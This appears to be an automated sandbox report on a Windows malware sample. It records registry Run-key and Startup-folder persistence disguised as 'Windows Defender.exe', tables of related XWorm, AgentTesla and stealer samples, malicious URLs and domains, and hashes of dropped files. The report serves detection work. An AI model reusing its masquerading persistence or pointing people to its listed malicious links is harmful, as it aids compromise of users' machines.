15:09:12	API Interceptor	165x Sleep call for process: owuP726k3d.exe modified
21:09:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Roaming\Windows Defender.exe
21:09:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Roaming\Windows Defender.exe
21:09:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	WV7Gj9lJ7W.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	18sFhgSyVK.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	UH7iNNKgPW.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	18fvs4AVae.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	cmd.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	z81zEuzkJPHHV3KYua.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Listing_error_15_code_file-002.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	ip-api.com/json/
	Listing_error_15_code_file-002.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	ip-api.com/json/
	NeftPaymentError_details__Emdtd22102024_jpg.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	ip-api.com/json/
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
172.67.75.40	zkGOUJOnmc.elf	Get hash	malicious	Unknown	Browse	arc-gym.com.cutestat.com/wp-login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rentry.co	gkzHdqfg.ps1	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	xaSPJNbl.ps1	Get hash	malicious	LummaC	Browse	172.67.75.40
	Exploit Detector.bat	Get hash	malicious	Unknown	Browse	172.67.75.40
	MilwaukeeRivers.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	http://www.thearchiterra.gr/	Get hash	malicious	Unknown	Browse	104.26.2.16
	RobCheat.exe	Get hash	malicious	Python Stealer, CStealer	Browse	172.67.75.40
	Spedizione.vbs	Get hash	malicious	Unknown	Browse	172.67.75.40
	sims-4-updater-v1.3.4.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.2.16
	grA6aqodO5.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.3.16
ip-api.com	WV7Gj9lJ7W.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	18sFhgSyVK.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	UH7iNNKgPW.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	18fvs4AVae.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	cmd.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	z81zEuzkJPHHV3KYua.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Listing_error_15_code_file-002.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Listing_error_15_code_file-002.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	NeftPaymentError_details__Emdtd22102024_jpg.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SALSGIVERUS	1LFcs1ZJy2.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	enigma_loader.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
	exe006.exe	Get hash	malicious	SheetRat	Browse	147.185.221.23
	exe003.exe	Get hash	malicious	XWorm	Browse	147.185.221.22
	yF21ypxRB7.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
	OXhiMvksgM.exe	Get hash	malicious	XWorm	Browse	147.185.221.22
	9GlCWW6bXc.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
	fiPZoO6xvJ.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
	EternalPredictor.exe	Get hash	malicious	Blank Grabber, Skuld Stealer, XWorm	Browse	147.185.221.23
	eternal.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	18sFhgSyVK.exe	Get hash	malicious	XWorm	Browse	172.66.0.158
	kwlYObMOSn.exe	Get hash	malicious	XWorm	Browse	104.20.22.46
	https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	cmd.exe	Get hash	malicious	Blank Grabber	Browse	162.159.128.233
	http://elizgallery.com/js.php	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://elizgallery.com/nazvanie.js	Get hash	malicious	Unknown	Browse	104.22.0.204
TUT-ASUS	WV7Gj9lJ7W.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	18sFhgSyVK.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	UH7iNNKgPW.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	18fvs4AVae.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	cmd.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	z81zEuzkJPHHV3KYua.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Listing_error_15_code_file-002.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Listing_error_15_code_file-002.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	NeftPaymentError_details__Emdtd22102024_jpg.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	WV7Gj9lJ7W.exe	Get hash	malicious	XWorm	Browse	172.67.75.40
	18sFhgSyVK.exe	Get hash	malicious	XWorm	Browse	172.67.75.40
	kwlYObMOSn.exe	Get hash	malicious	XWorm	Browse	172.67.75.40
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.75.40
	psol.txt.ps1	Get hash	malicious	LummaC	Browse	172.67.75.40
	SystemCoreHelper.dll	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.75.40
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.75.40
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.75.40
	17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe	Get hash	malicious	XWorm	Browse	172.67.75.40

Process:	C:\Users\user\AppData\Roaming\Windows Defender.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\owuP726k3d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.7195394315431693
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:	0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:	17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:	934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512:	FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nx1v3hw.fij.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14togbwg.ute.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_342w5sga.kmf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41bky102.isw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ztbimda.0ta.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ber4toij.pl1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqeupybr.nad.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4jr02t4.yhf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clxt30k0.v4n.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmw1hgce.5hd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ede2s5uo.ic4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxdcoy4i.x2u.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_in3wnjfa.i20.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twgmggrt.lw2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2ewjlvd.vk4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywleyvwn.jhl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk

Download File

Process:	C:\Users\user\Desktop\owuP726k3d.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 19:09:12 2024, mtime=Sat Nov 23 19:09:12 2024, atime=Sat Nov 23 19:09:12 2024, length=46080, window=hide
Category:	dropped
Size (bytes):	812
Entropy (8bit):	5.049022566256562
Encrypted:	false
SSDEEP:	12:8aS4CDkCh5Y//G6GILeZu1t9ooOjAeHI8W+oUc/c5mV:8ICgdOgUKt9SA71+tK2m
MD5:	33B76D37AEB844248F834EE2D4B9845E
SHA1:	E93C528226D41EAD10915CAD6F2074D9E63D2B48
SHA-256:	5F0708D9EC3E310D2945EFE8607B7BB3CF5F3A403FD3D2A1129B3722452F97EF
SHA-512:	7BBE631D61CF89350B03E204E2D779B90D9237F517C81FC35FFB733A84327A1D284F3913AB4FB87FE5E4FF33D649AAFE85BB0CA5C3F0EE318D2608744A6CBCAE
Malicious:	false
Preview:	L..................F.... ........=.......=.......=............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...a^Wd.=...2...=......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BwY............................d...A.p.p.D.a.t.a...B.V.1.....wY....Roaming.@......EW)BwY................................R.o.a.m.i.n.g.....v.2.....wY'. .WINDOW~1.EXE..Z......wY'.wY'...........................).).W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...e.x.e.......c...............-.......b...........^.D......C:\Users\user\AppData\Roaming\Windows Defender.exe..#.....\.....\.....\.....\.....\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...e.x.e.`.......X.......971342...........hT..CrF.f4... ..\G.....,...E...hT..CrF.f4... ..\G.....,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Windows Defender.exe

Download File

Process:	C:\Users\user\Desktop\owuP726k3d.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46080
Entropy (8bit):	5.635895794683882
Encrypted:	false
SSDEEP:	768:fvn+LJZ2ny8BcGhsWc3cQHqGbgEbFEP89ObA6BOuh3zjjU:fHABTMmq6FN9UA6BOuFE
MD5:	04F89F83BA27038601E2321B08D0B4CA
SHA1:	EDECD6D74AC90BBD235334EE17C2CAE0ABABA51B
SHA-256:	4D3101BA1EC70DDD04A30B6F04A67817920A6601E477339E5C135C167F6AB1E2
